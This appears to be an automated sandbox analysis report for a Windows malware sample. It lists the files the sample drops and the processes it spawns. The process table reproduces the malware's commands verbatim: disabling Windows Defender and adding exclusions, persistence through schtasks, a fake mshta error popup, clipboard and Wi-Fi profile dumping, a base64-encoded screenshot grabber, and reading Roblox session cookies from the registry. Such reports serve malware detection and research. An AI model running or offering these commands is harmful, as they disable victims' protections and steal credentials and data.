Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
sB2ClgrGng.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mVQsx.zip
|
RAR archive data, v5
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\word.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x86cff748, page size 16384, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\word.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ \Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\RESADCB.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Oct 13 18:30:42 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\blank.aes
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\bound.blank
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11gu0fnd.k2r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2blbqggg.02m.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jeh404a.0hl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axsy1ahk.owl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbi2qw1r.vfm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2ubpqua.itu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehf5uq5h.gr5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoozeasq.xol.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5hwmpb4.zbb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rv2o4m.223.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hotdhjw5.hs2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiksovxh.hiu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqoq1r12.2tn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l45qwzss.uhg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzkj5uxg.1m5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5ou2qhr.jjb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oguaqej5.dox.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqob2ocd.xwu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkijazon.g12.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4zctjnl.ge4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scbvfnjn.2lg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scpdvtzq.4qa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seg5ls1j.bu0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spliepfc.b4f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsllid50.opd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umqrwf1h.imm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrttqmvp.pps.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4lb1nv1.fcr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:01:16
2024, mtime=Sun Oct 13 16:01:16 2024, atime=Sun Oct 13 16:01:16 2024, length=68096, window=hide
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 61 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\sB2ClgrGng.exe
|
"C:\Users\user\Desktop\sB2ClgrGng.exe"
|
||
C:\Users\user\Desktop\sB2ClgrGng.exe
|
"C:\Users\user\Desktop\sB2ClgrGng.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection
$true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection
AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent
2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "start bound.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install
recent update. click ok to retry.', 0, 'Error', 0+16);close()""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring
$true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting
Disabled -SubmitSamplesConsent NeverSend
|
||
C:\Users\user\AppData\Local\Temp\bound.exe
|
bound.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\ .scr'"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-Clipboard
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "systeminfo"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profile
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Users\user\AppData\Roaming\word.exe
|
C:\Users\user\AppData\Roaming\word.exe
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "getmac"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
|
||
C:\Windows\System32\getmac.exe
|
getmac
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
